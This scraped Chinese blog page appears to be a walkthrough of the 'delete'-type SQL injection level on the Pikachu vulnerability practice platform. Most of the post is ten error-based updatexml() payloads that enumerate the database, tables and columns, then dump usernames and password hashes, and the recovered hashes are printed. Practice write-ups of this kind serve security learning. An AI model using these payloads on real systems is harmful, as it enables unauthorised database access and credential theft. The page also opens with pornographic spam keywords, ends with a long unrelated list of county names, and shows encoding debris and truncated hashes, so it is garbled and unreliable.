五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection Delete型注入通關(guān)指南pika~pika~

2023-03-11 12:31 作者:Yukito_online  | 我要投稿


刪除數(shù)據(jù)的時(shí)候觀察F12發(fā)送了一個(gè)GET請(qǐng)求的數(shù)據(jù)包,猜測(cè)id字段存在注入點(diǎn)

傳一個(gè)單引號(hào),發(fā)現(xiàn)報(bào)錯(cuò),證實(shí)id字段存在注入點(diǎn),我們用updataxml()方法,原理是updatexml()不認(rèn)識(shí)~(ASCII碼0x7e)

1+||+updatexml(1,concat(0x7e,database()),2)
1+||+updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 3,1)),2)
1+||+updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1)),2)
1+||+updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 12,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 1,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 0,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 2,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 0,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 1,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 2,1)),2)

admin:e10adc3949ba59abbe56e057f20f883

pikachu:670b14728ad9902aecba32e22fa4f6b

test:e99a18c428cb38d5f260853678922e0?


Pikachu 漏洞練習(xí)平臺(tái)Sql Injection Delete型注入通關(guān)指南pika~pika~的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國家法律
晋江市| 红原县| 桃源县| 西吉县| 安泽县| 应城市| 隆德县| 潮安县| 肇庆市| 醴陵市| 黄冈市| 婺源县| 祁门县| 仪征市| 二连浩特市| 张北县| 禄劝| 纳雍县| 平塘县| 广州市| 安化县| 南陵县| 镶黄旗| 夏津县| 白山市| 疏附县| 沅江市| 岐山县| 靖安县| 尖扎县| 汶上县| 富川| 桂东县| 腾冲县| 无为县| 文水县| 盐城市| 盐津县| 弥渡县| 苏尼特右旗| 乐平市|